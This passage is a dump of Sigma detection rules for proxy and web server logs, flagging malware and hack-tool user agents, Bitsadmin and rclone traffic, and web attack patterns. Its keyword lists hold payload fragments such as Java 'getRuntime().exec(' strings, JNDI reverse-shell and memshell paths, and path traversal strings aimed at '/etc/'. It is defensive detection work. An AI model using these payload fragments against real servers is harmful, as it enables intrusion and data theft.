Chrome/102.0.5005.63 Safari/537.36 Edg/100.0.1185.39' # https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/ - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3; .NET4.0C; .NET4.0E)' # https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/ - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # PlugX backdoor 
https://unit42.paloaltonetworks.com/thor-plugx-variant/ - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246001' # RedCurl Downloader APT https://www.facct.ru/blog/redcurl-2024 condition: selection falsepositives: - Old browsers level: high ================================================ FILE: rules/web/proxy_generic/proxy_ua_base64_encoded.yml ================================================ title: Suspicious Base64 Encoded User-Agent id: d443095b-a221-4957-a2c4-cd1756c9b747 related: - id: 894a8613-cf12-48b3-8e57-9085f54aa0c3 type: derived status: test description: Detects suspicious encoded User-Agent strings, as seen used by some malware. references: - https://deviceatlas.com/blog/list-of-user-agent-strings#desktop author: Nasreddine Bencherchali (Nextron Systems) date: 2023-05-04 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent|startswith: - 'Q2hyb21l' # Chrome Encoded with offset to not include padding - 'QXBwbGVXZWJLaX' # AppleWebKit Encoded with offset to not include padding - 'RGFsdmlr' # Dalvik Encoded with offset to not include padding - 'TW96aWxsY' # Mozilla Encoded with offset to not include padding (as used by YamaBot) condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml ================================================ title: Bitsadmin to Uncommon IP Server Address id: 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3 status: test description: Detects Bitsadmin connections to IP addresses instead of FQDN names references: - https://isc.sans.edu/diary/Microsoft+BITS+Used+to+Download+Payloads/21027 author: Florian Roth (Nextron Systems) date: 2022-06-10 modified: 2022-08-24 tags: - attack.command-and-control - attack.t1071.001 - attack.defense-evasion - attack.persistence - attack.t1197 - attack.s0190 
logsource: category: proxy detection: selection: c-useragent|startswith: 'Microsoft BITS/' cs-host|endswith: - '1' - '2' - '3' - '4' - '5' - '6' - '7' - '8' - '9' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml ================================================ title: Bitsadmin to Uncommon TLD id: 9eb68894-7476-4cd6-8752-23b51f5883a7 status: test description: Detects Bitsadmin connections to domains with uncommon TLDs references: - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ author: Florian Roth (Nextron Systems), Tim Shelton date: 2019-03-07 modified: 2023-05-17 tags: - attack.command-and-control - attack.t1071.001 - attack.defense-evasion - attack.persistence - attack.t1197 - attack.s0190 logsource: category: proxy detection: selection: c-useragent|startswith: 'Microsoft BITS/' falsepositives: cs-host|endswith: - '.com' - '.net' - '.org' - '.scdn.co' # spotify streaming - '.sfx.ms' # Microsoft domain, example request: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-08-15-21-xx-xx/PreSignInSettingsConfig.json condition: selection and not falsepositives falsepositives: - Rare programs that use Bitsadmin and update from regional TLDs e.g. 
.uk or .ca level: high ================================================ FILE: rules/web/proxy_generic/proxy_ua_cryptominer.yml ================================================ title: Crypto Miner User Agent id: fa935401-513b-467b-81f4-f9e77aa0dd78 status: test description: Detects suspicious user agent strings used by crypto miners in proxy logs references: - https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65 - https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h author: Florian Roth (Nextron Systems) date: 2019-10-21 modified: 2021-11-27 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent|startswith: # XMRig - 'XMRig ' # CCMiner - 'ccminer' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/web/proxy_generic/proxy_ua_empty.yml ================================================ title: HTTP Request With Empty User Agent id: 21e44d78-95e7-421b-a464-ffd8395659c4 status: test description: | Detects a potentially suspicious empty user agent string in proxy logs. Could potentially indicate an uncommon request method. 
references: - https://twitter.com/Carlos_Perez/status/883455096645931008 author: Florian Roth (Nextron Systems) date: 2017-07-08 modified: 2021-11-27 tags: - attack.defense-evasion - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: # Empty string - as used by Powershell's (New-Object Net.WebClient).DownloadString c-useragent: '' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/web/proxy_generic/proxy_ua_frameworks.yml ================================================ title: Exploit Framework User Agent id: fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f status: test description: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs references: - https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/ author: Florian Roth (Nextron Systems) date: 2017-07-08 modified: 2025-01-18 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent: # Cobalt Strike https://www.cobaltstrike.com/help-malleable-c2 - 'Internet Explorer *' - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)' # https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/ # Metasploit Framework - Analysis by Didier Stevens https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/ - 'Mozilla/4.0 (compatible; Metasploit RSPEC)' - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' # old browser, rare, base-lining needed - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' # old browser, rare, base-lining needed - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)' # old browser, rare, base-lining needed - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; 
.N' - 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' # only use in proxy logs - not for detection in web server logs - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13' - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)' # Payloads # Metasploit Update by Florian Roth 08.07.2017 - 'Mozilla/5.0' - 'Mozilla/4.0 (compatible; SPIPE/1.0' # - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)' # too many false positives expected # - 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' # too many false positives expected - 'Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0' - 'Sametime Community Agent' # Unknown if prone to false positives - https://github.com/rapid7/metasploit-framework/blob/97095ab3113de2f046e64a64c461a1f888554401/modules/exploits/windows/http/steamcast_useragent.rb - 'X-FORWARDED-FOR' - 'DotDotPwn v2.1' - 'SIPDROID' - 'Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)' # CobaltStrike https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/ # Empire - 'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0' # Exploits - '*wordpress hash grabber*' - '*exploit*' # Havoc - 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' # https://github.com/HavocFramework/Havoc/issues/519 condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/web/proxy_generic/proxy_ua_hacktool.yml ================================================ title: Hack Tool User Agent id: c42a3073-30fb-48ae-8c99-c23ada84b103 status: test description: Detects suspicious user agent strings used by hack tools in proxy logs references: - 
https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules author: Florian Roth (Nextron Systems) date: 2017-07-08 modified: 2022-07-07 tags: - attack.initial-access - attack.t1190 - attack.credential-access - attack.t1110 logsource: category: proxy detection: selection: c-useragent|contains: # Vulnerability scanner and brute force tools - '(hydra)' - ' arachni/' - ' BFAC ' - ' brutus ' - ' cgichk ' - 'core-project/1.0' - ' crimscanner/' - 'datacha0s' - 'dirbuster' - 'domino hunter' - 'dotdotpwn' - 'FHScan Core' - 'floodgate' - 'get-minimal' - 'gootkit auto-rooter scanner' - 'grendel-scan' - ' inspath ' - 'internet ninja' - 'jaascois' - ' zmeu ' - 'masscan' - ' metis ' - 'morfeus fucking scanner' - 'n-stealth' - 'nsauditor' - 'pmafind' - 'security scan' - 'springenwerk' - 'teh forest lobster' - 'toata dragostea' - ' vega/' - 'voideye' - 'webshag' - 'webvulnscan' - ' whcc/' # SQL Injection - ' Havij' - 'absinthe' - 'bsqlbf' - 'mysqloit' - 'pangolin' - 'sql power injector' - 'sqlmap' - 'sqlninja' - 'uil2pn' # Hack tool - 'ruler' # https://www.crowdstrike.com/blog/using-outlook-forms-lateral-movement-persistence/ - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)' # SQLi Dumper condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/web/proxy_generic/proxy_ua_malware.yml ================================================ title: Malware User Agent id: 5c84856b-55a5-45f1-826f-13f37250cf4e status: test description: Detects suspicious user agent strings used by malware in proxy logs references: - http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules - http://www.botopedia.org/search?searchword=scan&searchphrase=all - 
https://networkraptor.blogspot.com/2015/01/user-agent-strings.html - https://perishablepress.com/blacklist/ua-2013.txt - https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents - https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q - https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large - https://twitter.com/crep1x/status/1635034100213112833 author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2017-07-08 modified: 2024-04-14 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent: # RATs - 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0' # DragonOK - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439 - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439 - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)' # Used by PlugX - old - https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ - 'HttpBrowser/1.0' # HTTPBrowser RAT - '*<|>*' # Houdini / Iniduoh / njRAT - 'nsis_inetc (mozilla)' # ZeroAccess - 'Wget/1.9+cvs-stable (Red Hat modified)' # Dyre / Upatre # Ghost419 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/ - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)' # Malware - '*zeroup*' # W32/Renos.Downloader - 'Mozilla/5.0 (Windows NT 5.1 ; v.*' # Kazy - '* adlib/*' - '* tiny' # Trojan Downloader - '* BGroom *' # Trojan Downloader - '* changhuatong' - '* CholTBAgent' - 'Mozilla/5.0 WinInet' - 'RookIE/1.0' - 'M' # HkMain - 'Mozilla/4.0 (compatible; MSIE 8.0; 
Windows NT 5.1; Trident/4.0)' # Egamipload - old UA - probable prone to false positives - 'Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)' # Yakes - 'backdoorbot' - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)' # Sality - 'Opera/8.81 (Windows NT 6.0; U; en)' # Sality - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)' # Sality - 'Opera' # Trojan Keragany - 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)' # Fareit - 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)' # Webshell's back connect - 'MSIE' # Toby web shell - '*(Charon; Inferno)' # Loki Bot - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)' # Fareit / Pony - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' # https://www.virustotal.com/gui/file/8abbef8e58f012d45a7cb46c3c2729dcd33cf53e721ff8c59e238862aa0a9e0e/detection - 'Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)' # MacControl malware https://www.virustotal.com/gui/file/d60f61f1f03a5011a0240694e110c6d370bf68a92753093186c6d14e26a15428/detection https://www.symantec.com/connect/blogs/osxmacontrol-back-it-again - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' # used by Zebrocy malware https://app.any.run/tasks/7d7fa4a0-6970-4428-828b-29572abf9ceb/ # Ursnif - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)' - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)' # Emotet - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)' # https://twitter.com/webbthewombat/status/1225827092132179968 # Lockbit (https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q) - 'Mozilla/5.0 (Windows NT 6.1)' - 'AppleWebkit/587.38 (KHTML, like Gecko)' - 'Chrome/91.0.4472.77' - 'Safari/537.36' - 'Edge/91.0.864.37' - 'Firefox/89.0' - 'Gecko/20100101' # Others - '* pxyscand*' - '* asd' - '* mdms' - 'sample' - 'nocase' - 
'Moxilla' - 'Win32 *' - '*Microsoft Internet Explorer*' - 'agent *' - 'AutoIt' # Suspicious - base-lining recommended - 'IczelionDownLoad' - 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # https://unit42.paloaltonetworks.com/thor-plugx-variant/ - 'record' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/ - 'mozzzzzzzzzzz' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/ - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0' # Quasar RAT UA https://twitter.com/malmoeb/status/1559994820692672519?s=20&t=g3tkNL09dZZWbFN10qDVjg - 'Havana/0.1' # https://www.cybereason.com/blog/threat-alert-havanacrypt-ransomware-masquerading-as-google-update - 'antSword/v2.1' # AntSword Webshell UA - 'rqwrwqrqwrqw' # Racoon Stealer - 'qwrqrwrqwrqwr' # Racoon Stealer - 'rc2.0/client' # Racoon Stealer - 'TakeMyPainBack' # Racoon Stealer - 'xxx' # Racoon Stealer - '20112211' # Racoon Stealer - '23591' # Racoon Stealer - '901785252112' # Racoon Stealer - '1235125521512' # Racoon Stealer - '125122112551' # Racoon Stealer - 'B1D3N_RIM_MY_ASS' # Racoon Stealer - 'AYAYAYAY1337' # Racoon Stealer - 'iMightJustPayMySelfForAFeature' # Racoon Stealer - 'ForAFeature' # Racoon Stealer - 'Ares_ldr_v_*' # AresLoader # - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106' # seen used by AresLoader - 'Microsoft Internet Explorer' # https://github.com/silence-is-best/c2db - 'CLCTR' # https://github.com/silence-is-best/c2db - 'uploader' # https://github.com/silence-is-best/c2db - 'agent' # https://github.com/silence-is-best/c2db - 'License' # https://github.com/silence-is-best/c2db - 'vb wininet' # https://github.com/silence-is-best/c2db - 'Client' # https://github.com/silence-is-best/c2db - 'Lilith-Bot/3.0' # Lilith Stealer - https://twitter.com/suyog41/status/1558051450797690880 - 'svc/1.0' # SVC Loader - 
https://twitter.com/suyog41/status/1558051450797690880 - 'WSHRAT' # WSHRAT - https://twitter.com/suyog41/status/1558051450797690880 - 'ZeroStresser Botnet/1.5' # Zerobot - https://twitter.com/suyog41/status/1558051450797690880 - 'OK' # Nymaim - https://twitter.com/suyog41/status/1558051450797690880 - 'Project1sqlite' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880 - 'Project1' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880 - 'DuckTales' # Racoon Stealer - 'Zadanie' # Racoon Stealer - 'GunnaWunnaBlueTips' # Racoon Stealer - 'Xlmst' # Racoon Stealer - 'GeekingToTheMoon' # Racoon Stealer - 'SunShineMoonLight' # Racoon Stealer - 'BunnyRequester' # BunnyStealer - 'BunnyTasks' # BunnyStealer - 'BunnyStealer' # BunnyStealer - 'BunnyLoader_Dropper' # BunnyStealer - 'BunnyLoader' # BunnyStealer - 'BunnyShell' # BunnyStealer - 'SPARK-COMMIT' # SparkRAT - https://arcticwolf.com/resources/blog/tellmethetruth-exploitation-of-cve-2023-46604-leading-to-ransomware/ - '4B4DB4B3' # B4B3RAT - https://twitter.com/naumovax/status/1718956514491130301 - 'SouthSide' # Racoon Stealer - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)' # Latrodectus loader condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/web/proxy_generic/proxy_ua_powershell.yml ================================================ title: Windows PowerShell User Agent id: c8557060-9221-4448-8794-96320e6f3e74 status: test description: Detects Windows PowerShell Web Access references: - https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest author: Florian Roth (Nextron Systems) date: 2017-03-13 modified: 2021-11-27 tags: - attack.defense-evasion - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent|contains: ' WindowsPowerShell/' condition: selection falsepositives: - Administrative scripts that download 
files from the Internet - Administrative scripts that retrieve certain website contents level: medium ================================================ FILE: rules/web/proxy_generic/proxy_ua_rclone.yml ================================================ title: Rclone Activity via Proxy id: 2c03648b-e081-41a5-b9fb-7d854a915091 status: test description: Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string references: - https://rclone.org/ - https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone author: Janantha Marasinghe date: 2022-10-18 tags: - attack.exfiltration - attack.t1567.002 logsource: category: proxy detection: selection: c-useragent|startswith: 'rclone/v' condition: selection falsepositives: - Valid requests with this exact user agent that are sent by legitimate scripts or sysadmin operations level: medium ================================================ FILE: rules/web/proxy_generic/proxy_ua_susp.yml ================================================ title: Suspicious User Agent id: 7195a772-4b3f-43a4-a210-6a003d65caa1 status: test description: Detects suspicious malformed user agent strings in proxy logs references: - https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb author: Florian Roth (Nextron Systems) date: 2017-07-08 modified: 2022-10-31 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection1: c-useragent|startswith: - 'user-agent' # User-Agent: User-Agent: - 'Mozilla/3.0 ' - 'Mozilla/2.0 ' - 'Mozilla/1.0 ' - 'Mozilla ' # missing slash - ' Mozilla/' # leading space - 'Mozila/' # single 'l' - 'Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol' # https://twitter.com/NtSetDefault/status/1303643299509567488 selection2: c-useragent|contains: - ' (compatible;MSIE ' # typical typo - missing space - 
'.0;Windows NT ' # typical typo - missing space - 'loader' # https://twitter.com/securityonion/status/1522614635152744453?s=20&t=gHyPTSq5A27EqKwrCd9ohg selection3: c-useragent: - '_' - 'CertUtil URL Agent' # https://twitter.com/stvemillertime/status/985150675527974912 - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)' # CobaltStrike Beacon https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/ - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # used by APT28 malware https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html - 'HTTPS' # https://twitter.com/stvemillertime/status/1204437531632250880 - 'Erbium-UA-4ce7c27cb4be9d32e333bf032c88235a' # https://www.cyfirma.com/outofband/erbium-stealer-malware-report - 'x' # Use by Racoon Stealer but could be something else - 'xxx' # Use by Racoon Stealer but could be something else falsepositives: - c-useragent: 'Mozilla/3.0 * Acrobat *' # Acrobat with linked content - cs-host|endswith: # Adobe product traffic, example: Mozilla/3.0 (compatible; Adobe Synchronizer 10.12.20000) - '.acrobat.com' - '.adobe.com' - '.adobe.io' condition: 1 of selection* and not falsepositives falsepositives: - Unknown level: high ================================================ FILE: rules/web/proxy_generic/proxy_ua_susp_base64.yml ================================================ title: Potential Base64 Encoded User-Agent id: 894a8613-cf12-48b3-8e57-9085f54aa0c3 related: - id: d443095b-a221-4957-a2c4-cd1756c9b747 type: derived status: test description: Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding. 
references: - https://blogs.jpcert.or.jp/en/2022/07/yamabot.html - https://deviceatlas.com/blog/list-of-user-agent-strings#desktop author: Florian Roth (Nextron Systems), Brian Ingram (update) date: 2022-07-08 modified: 2023-05-04 tags: - attack.command-and-control - attack.t1071.001 logsource: category: proxy detection: selection: c-useragent|endswith: '=' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/web/proxy_generic/proxy_webdav_external_execution.yml ================================================ title: Suspicious External WebDAV Execution id: 1ae64f96-72b6-48b3-ad3d-e71dff6c6398 related: - id: 4c55738d-72d8-490e-a2db-7969654e375f type: similar status: test description: | Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns. references: - https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4 - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 - https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html author: Ahmed Farouk date: 2024-05-10 tags: - attack.initial-access - attack.resource-development - attack.t1584 - attack.t1566 logsource: category: proxy detection: selection_webdav: c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/' cs-method: 'GET' selection_execution: c-uri|endswith: - '.7z' - '.bat' - '.dat' - '.cmd' - '.exe' - '.js' - '.lnk' - '.ps1' - '.rar' - '.url' - '.vbe' - '.vbs' - '.zip' filter_main_local_ips: dst_ip|cidr: - '127.0.0.0/8' - '10.0.0.0/8' - '172.16.0.0/12' - '192.168.0.0/16' - '169.254.0.0/16' - '::1/128' # IPv6 loopback - 'fe80::/10' # IPv6 link-local addresses - 'fc00::/7' # IPv6 private addresses condition: all of selection_* and not 1 of 
filter_main_* falsepositives: - Unknown level: high ================================================ FILE: rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml ================================================ title: F5 BIG-IP iControl Rest API Command Execution - Webserver id: 85254a62-22be-4239-b79c-2ec17e566c37 related: - id: b59c98c6-95e8-4d65-93ee-f594dfb96b17 type: similar status: test description: Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP references: - https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash - https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029 - https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516 author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo date: 2023-11-08 tags: - attack.execution - attack.t1190 - attack.initial-access logsource: category: webserver detection: selection: cs-method: 'POST' cs-uri-query|endswith: '/mgmt/tm/util/bash' condition: selection falsepositives: - Legitimate usage of the BIG IP REST API to execute command for administration purposes level: medium ================================================ FILE: rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml ================================================ title: Successful IIS Shortname Fuzzing Scan id: 7cb02516-6d95-4ffc-8eee-162075e111ac status: test description: When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~" references: - https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml - https://www.exploit-db.com/exploits/19525 - https://github.com/lijiejie/IIS_shortname_Scanner author: frack113 date: 2021-10-06 modified: 2023-01-02 tags: - attack.initial-access - attack.t1190 logsource: category: webserver detection: 
selection: cs-uri-query|contains: '~1' cs-uri-query|endswith: 'a.aspx' cs-method: - GET - OPTIONS # Success only sc-status: - 200 - 301 condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/web/webserver_generic/web_java_payload_in_access_logs.yml ================================================ title: Java Payload Strings id: 583aa0a2-30b1-4d62-8bf3-ab73689efe6c status: test description: Detects possible Java payloads in web access logs references: - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ - https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/ - https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md - https://twitter.com/httpvoid0x2f/status/1532924261035384832 - https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035 author: frack113, Harjot Singh, "@cyb3rjy0t" (update) date: 2022-06-04 modified: 2023-01-19 tags: - cve.2022-26134 - cve.2021-26084 - attack.initial-access - attack.t1190 logsource: category: webserver detection: keywords: - '%24%7B%28%23a%3D%40' - '${(#a=@' - '%24%7B%40java' - '${@java' - 'u0022java' - '%2F%24%7B%23' - '/${#' - 'new+java.' 
- 'getRuntime().exec(' - 'getRuntime%28%29.exec%28' condition: keywords falsepositives: - Legitimate apps level: high ================================================ FILE: rules/web/webserver_generic/web_jndi_exploit.yml ================================================ title: JNDIExploit Pattern id: 412d55bc-7737-4d25-9542-5b396867ce55 status: test description: Detects exploitation attempts using the JNDI-Exploit-Kit references: - https://github.com/pimps/JNDI-Exploit-Kit - https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit author: Florian Roth (Nextron Systems) date: 2021-12-12 modified: 2022-12-25 tags: - attack.initial-access - attack.t1190 logsource: category: webserver detection: keywords: - '/Basic/Command/Base64/' - '/Basic/ReverseShell/' - '/Basic/TomcatMemshell' - '/Basic/JettyMemshell' - '/Basic/WeblogicMemshell' - '/Basic/JBossMemshell' - '/Basic/WebsphereMemshell' - '/Basic/SpringMemshell' - '/Deserialization/URLDNS/' - '/Deserialization/CommonsCollections1/Dnslog/' - '/Deserialization/CommonsCollections2/Command/Base64/' - '/Deserialization/CommonsBeanutils1/ReverseShell/' - '/Deserialization/Jre8u20/TomcatMemshell' - '/TomcatBypass/Dnslog/' - '/TomcatBypass/Command/' - '/TomcatBypass/ReverseShell/' - '/TomcatBypass/TomcatMemshell' - '/TomcatBypass/SpringMemshell' - '/GroovyBypass/Command/' - '/WebsphereBypass/Upload/' condition: keywords falsepositives: - Legitimate apps that use these paths level: high ================================================ FILE: rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml ================================================ title: Path Traversal Exploitation Attempts id: 7745c2ea-24a5-4290-b680-04359cb84b35 status: test description: Detects path traversal exploitation attempts references: - https://github.com/projectdiscovery/nuclei-templates - https://book.hacktricks.xyz/pentesting-web/file-inclusion author: Subhash Popuri (@pbssubhash), Florian Roth 
(Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems) date: 2021-09-25 modified: 2023-08-31 tags: - attack.initial-access - attack.t1190 logsource: category: webserver detection: selection: cs-uri-query|contains: - '../../../../../lib/password' - '../../../../windows/' - '../../../etc/' - '..%252f..%252f..%252fetc%252f' - '..%c0%af..%c0%af..%c0%afetc%c0%af' - '%252e%252e%252fetc%252f' condition: selection falsepositives: - Expected to be continuously seen on systems exposed to the Internet - Internal vulnerability scanners level: medium ================================================ FILE: rules/web/webserver_generic/web_source_code_enumeration.yml ================================================ title: Source Code Enumeration Detection by Keyword id: 953d460b-f810-420a-97a2-cfca4c98e602 status: test description: Detects source code enumeration that use GET requests by keyword searches in URL strings references: - https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html - https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1 author: James Ahearn date: 2019-06-08 modified: 2022-10-05 tags: - attack.discovery - attack.t1083 logsource: category: webserver detection: keywords: - '.git/' condition: keywords falsepositives: - Unknown level: medium ================================================ FILE: rules/web/webserver_generic/web_sql_injection_in_access_logs.yml ================================================ title: SQL Injection Strings In URI id: 